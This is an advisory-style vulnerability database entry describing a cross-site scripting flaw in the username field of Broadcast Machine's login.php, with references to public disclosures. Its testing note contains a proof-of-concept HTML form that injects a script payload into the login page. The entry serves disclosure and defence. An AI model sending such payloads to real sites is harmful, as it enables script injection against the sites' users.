Broadcast Machine login.php username Variable XSS

2007-11-12T00:00:00
ID OSVDB:39735
Type osvdb
Reporter OSVDB
Modified 2007-11-12T00:00:00

Description

Manual Testing Notes

<form action="http://[target]/login.php" method="post"><input type="text" name="username" value='"<script>alert(1)</script>'><input type="submit"></form>

References:

Vendor URL: http://www.getmiro.com/create/broadcast/
Other Advisory URL: http://www.int21.de/cve/CVE-2007-3694-bm.html
Other Advisory URL: http://securityreason.com/securityalert/3363
Mail List Post: http://lists.grok.org.uk/pipermail/full-disclosure/2007-November/067486.html
ISS X-Force ID: 38418
CVE-2007-3694
Bugtraq ID: 26407